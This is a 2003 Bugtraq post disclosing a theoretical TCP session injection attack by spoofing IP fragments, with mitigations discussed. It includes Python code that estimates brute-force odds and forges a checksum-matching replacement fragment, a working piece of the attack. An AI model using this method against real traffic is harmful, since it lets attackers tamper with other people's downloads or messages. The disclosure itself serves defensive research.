Date: Thu, 11 Dec 2003 00:28:28 +0100 (CET)
To: bugtraq@securityfocus.com

Good morning,

I am not quite sure there was no prior discussion of this problem, but I could not find anything even remotely related, and so I think it makes sense to post here. This post roughly describes a thought I had recently - and I have to admit this is pure theory, even though it should be fairly easy to turn this into a practical attack.

Blind spoofing, hijacking and data insertion into TCP/IP sessions, although considered by some folks to be a threat of the past, still have some impact potential; I have provided some arguments to support this belief in my follow-up TCP/IP ISN analysis, in section 2, and I bet that is just the tip of the iceberg [ http://lcamtuf.coredump.cx/newtcp/#risks ]. Closing all the attack avenues by deploying "proper" cryptography is not always feasible or easy, and even then, the protection is not complete - the DoS potential remains.

Without cryptography, the integrity of TCP/IP sessions is protected only by a small set of parameters that are - hopefully - not known to a person not involved in the communications, and that offer enough possible values to make brute-force attacks usually not feasible. In practice, the Internet largely relies on the correctness and unpredictability of the initial sequence number (ISN) generation algorithms used in TCP/IP stacks on various systems and devices.

I have done some research on the quality of those implementations, as some of you may recall; so did others, and the situation has greatly improved in the past 5 years or so, although it is still not quite what we would like it to be. It is, however, expected that all mainstream operating systems offer reasonable ISN strength, and thus are not susceptible to trivial TCP/IP stream invasion.

There seems to be a more fundamental problem, however, a problem that renders sequence numbers and their quality practically irrelevant in certain common scenarios.
Consider the following: Bob sends a TCP/IP ACK packet to Alice, with a data payload and within an established session, a session the attacker is aware of (attacker-induced or server-to-server traffic, perhaps). Bob's packet exceeds the MTU somewhere en route (be it on some WAN interface, or on a local PPPoA, PPPoE or VPN interface), a situation not quite unheard of; the IP packet gets fragmented in order to be delivered successfully.

The first IP fragment carries the beginning of the TCP packet, including port numbers, sequence number, and other information that may be relatively difficult for a third party (the attacker) to guess otherwise. The remaining fragment or fragments of Bob's packet carry the rest of the TCP/IP payload, and are put back together with the headers and previous sections of the packet once received by Alice.

Here is where the attacker strikes: instead of attempting to determine the sequence number, he may spoof the second IP fragment and insert data into the TCP payload. There are only two problems he would face:

  1. Figuring out the IP ID value. Usually a minor inconvenience, since a majority of systems use sequential numbers, and so it is possible to guess the next value with no effort.

  2. Sending a fragment that would, after reassembly, still validate against the TCP checksum in the headers. The only real unknown is the sequence (and perhaps acknowledgment) number in there - the remainder can usually be either predicted to a degree, or simply overwritten with overlapping fragments, but the sequence number cannot be, for obvious reasons.

There are two approaches to the latter problem. Since the checksum is only 16 bits, it might be reasonable to simply trust your luck, rinse and repeat.
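To put a rough number on "trust your luck": the sketch below assumes that every spoofed fragment produces a checksum that is uniformly distributed over 2^16 values and that attempts are independent. Both are simplifying assumptions made for illustration, and the function names are hypothetical.

```python
import math


def success_probability(attempts: int, checksum_bits: int = 16) -> float:
    """Chance that at least one of `attempts` blind guesses passes the checksum.

    Assumes each guess matches independently with probability 2**-checksum_bits.
    """
    p = 1.0 / (1 << checksum_bits)
    # 1 - (1 - p)**attempts, computed via log1p/expm1 for numerical accuracy
    return -math.expm1(attempts * math.log1p(-p))


def attempts_needed(target_probability: float, checksum_bits: int = 16) -> int:
    """Smallest number of guesses that reaches `target_probability` of success."""
    p = 1.0 / (1 << checksum_bits)
    return math.ceil(math.log1p(-target_probability) / math.log1p(-p))


if __name__ == "__main__":
    print(attempts_needed(0.5))          # guesses for an even chance
    print(success_probability(1 << 16))  # chance after 2**16 guesses
```

Under these assumptions an even chance of success takes tens of thousands of spoofed fragments per targeted packet, which is why the second approach is the more interesting one.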
The second approach relies on targeting a known fragment of the payload: suppose the victim is downloading a known file or receiving a known e-mail message, and the attacker only wants to replace this known fragment with malicious code / contents. The attacker may calculate a partial checksum of the data, and then produce a replacement fragment whose contents sum to the same partial checksum (which can be achieved for arbitrary data using up to two padding bytes, because the checksum algorithm is neither cryptographically secure, nor offers a sufficient search space to withstand brute-force).

To summarise... the attack seems to be fairly practical, at the very least significantly decreasing the search space, and at the very best, effectively disabling any session integrity protection gained from unpredictable ISNs.

There are two major mitigating factors for this kind of attack:

  1. Path MTU discovery (DF set) prevents fragmentation [*]; some modern systems (Linux) default to this mode - although PMTU discovery is also known to cause problems in certain setups, so it is not always the best way to stop the attack.

     [*] Also note that certain types of routers or tunnels tend to ignore the DF flag, possibly opening this vector again.

  2. Random IP ID numbers, a feature of some systems (OpenBSD?), although also risky (increasing reassembly collision probability), make the attack more difficult.

In the situation when it is necessary to brute-force all 16 bits of the checksum and all 16 bits of the IP ID, the complexity of this data injection method starts to be comparable to a full 32-bit ISN brute-force - usually not feasible. In the likely situation where it is not necessary to brute-force all checksum variants, random IP IDs become only an inconvenience, raising the bar only slightly.
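The checksum-matching step of the second approach described above can be sketched as follows. This is a minimal illustration, not a working attack tool: it assumes the attacker knows the exact bytes of the original non-first fragment, that this fragment has an even length, and that the last two bytes of the replacement can be sacrificed as padding. The helper names (ones_complement_sum, internet_checksum, forge_fragment) are hypothetical. It relies on the fact that IP fragment offsets are multiples of 8 bytes, so a non-first fragment always starts on a 16-bit word boundary of the TCP segment.

```python
def ones_complement_sum(data: bytes) -> int:
    """16-bit ones' complement sum of big-endian words (RFC 1071 style)."""
    if len(data) % 2:
        data += b"\x00"  # an odd trailing byte is padded with zero
    total = sum((data[i] << 8) | data[i + 1] for i in range(0, len(data), 2))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def internet_checksum(data: bytes) -> int:
    """Checksum field value: complement of the ones' complement sum."""
    return ~ones_complement_sum(data) & 0xFFFF


def forge_fragment(original: bytes, evil: bytes, filler: bytes = b" ") -> bytes:
    """Build a same-length replacement whose partial sum equals the original's.

    `filler` must be a single byte; it fills the gap between the injected
    data and the two trailing padding bytes.
    """
    if len(original) % 2 or len(evil) > len(original) - 2:
        raise ValueError("need an even-length original with 2 spare bytes")
    body = evil + filler * (len(original) - 2 - len(evil))
    target = ones_complement_sum(original)
    partial = ones_complement_sum(body)
    # Ones' complement subtraction: target - partial == target + ~partial
    pad = target + (partial ^ 0xFFFF)
    pad = (pad & 0xFFFF) + (pad >> 16)  # fold the single possible carry
    return body + pad.to_bytes(2, "big")


if __name__ == "__main__":
    # Stand-in for the first fragment, which the attacker cannot see;
    # 24 bytes, a multiple of 8 as required for a non-final fragment.
    first = bytes.fromhex("04d2005012345678") * 3
    original = b"echo 'all is well' > /tmp/status.txt  \n"[:38]
    forged = forge_fragment(original, b"echo 'owned' > /tmp/status.txt\n")
    print(internet_checksum(first + original) == internet_checksum(first + forged))
```

Because the two partial sums are equal, the checksum over the reassembled segment is unchanged regardless of what the unseen first fragment contains, which is the point of the approach. The cost is two trailing bytes of attacker-uncontrolled data, which the injected content has to tolerate.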
Note that this has nothing to do with old firewall bypassing techniques and other tricks that used fragmentation to fool IDSes and so on - mandatory defragmentation of incoming traffic on perimeter devices will not solve the problem.